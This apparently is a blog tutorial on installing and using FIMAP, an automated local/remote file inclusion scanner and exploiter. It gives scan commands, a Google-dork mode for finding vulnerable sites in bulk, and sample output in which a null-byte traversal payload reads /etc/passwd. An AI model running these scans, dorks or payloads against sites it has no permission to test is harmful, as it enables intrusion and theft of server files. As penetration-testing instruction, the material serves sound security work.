FIMAP is a simple and amazing tool that used to penetration testing. This tool has made by Iman Karim, this is just one of his project at google-code. He made this tool using python, so it’s very easy to using it for scanning any bug or vulnerability in a site. So, for more guide, let’s begin the show…
1. Download the FIMAP
You can download this tool here or here.
2. Extract the compressed file
to extract the downloaded file, use the “tar -xvf” command. So it will be like this :
root@bt:~# tar -xvf fimap_alpha_v07.tar.gz
3. Then go to the extracted directory
Just write cd…I’m sure you’ve already knew it.
4. Run the FIMAP
To run this tool, you can type “./fimap.py” or “python fimap.py”
5. The output must be a help page to use this tool
6. a. To scan a single page
To scanning s single page, you have to input the target url path completely, examples :
root@bt:fimap_alpha_v07#./fimap.py -s -u http://target.site/index.php?cat=main
If there was a bug/vulnerability founded in the url, it will shown like this:
fimap v.07 by Iman Karim – Automatic LFI/RFI scanner and exploiter.
SingleScan is testing URL: ‘http://target.site/index.php?cat=main’
[OUT] Parsing URL ‘http://target.site/index.php?cat=main’…
[INFO] Fiddling around with URL…
[OUT] Possible file inclusion found! -> ‘http://target.site/index.php?cat=a4EihiFP’ with Parameter ‘cat’.
[OUT] Identifying Vulnerability ‘http://target.site/index.php?cat=main’ with Parameter ‘cat’…
[INFO] Scriptpath received: ‘/www/target’
[INFO] Trying NULL-Byte Poisoning to get rid of the suffix…
[INFO] NULL-Byte Poisoning successfull!
[INFO] Testing file ‘/etc/passwd’…
[INFO] Testing file ‘/proc/self/environ’…
[INFO] Skipping absolute file ‘php://input’.
[INFO] Testing file ‘/var/log/apache2/access.log’…
[INFO] Testing file ‘/var/log/apache/access.log’…
[INFO] Testing file ‘/var/log/httpd/access.log’…
[INFO] Testing file ‘/var/log/apache2/access_log’…
[INFO] Testing file ‘/var/log/apache/access_log’…
[INFO] Testing file ‘/var/log/httpd/access_log’…
[INFO] Skipping remote file ‘http://www.phpbb.de/index.php’.
[INFO] Skipping remote file ‘http://www.uni-bonn.de/Frauengeschichte/index.html’.
[INFO] Skipping remote file ‘http://www.kah-bonn.de/index.htm?presse/winterthur.htm’.
##################################################################
#[1] Possible File Injection #
##################################################################
# [URL] http://target.site/index.php?cat=main #
# [PARAM] cat #
# [PATH] /www/target #
# [TYPE] Relative with appendix ‘.php’ #
# [NULLBYTE] Works. 
#
# [READABLE FILES] #
# [0] /etc/passwd -> ../../../etc/passwd%00 #
##################################################################
b. To scan the multiple pages at once
First, you have to make the list of the target. For the example, I’ve made the list and I saved the file wich named “targetlist.txt” and I save this file at /tmp directory. Then, I can execute the command with this command :
root@bt:fimap_alpha_v07#./fimap.py -m -l ‘/tmp/targetlist.txt’
c. Use google to search any File Inclusion errors
Since we knew that file inclusion sometimes could be found in any include function at the php syntax, we can search for it with any file that usually used by the web-maker. You can use this command :
root@bt:fimap_alpha_v07#./fimap.py -g -q ‘inurl:php?cat= site:.com‘
And so many more function or feature in this tool, all you have to do is explore it by yourself. But, please don’t use this tool to penetrating and cracking someone website.
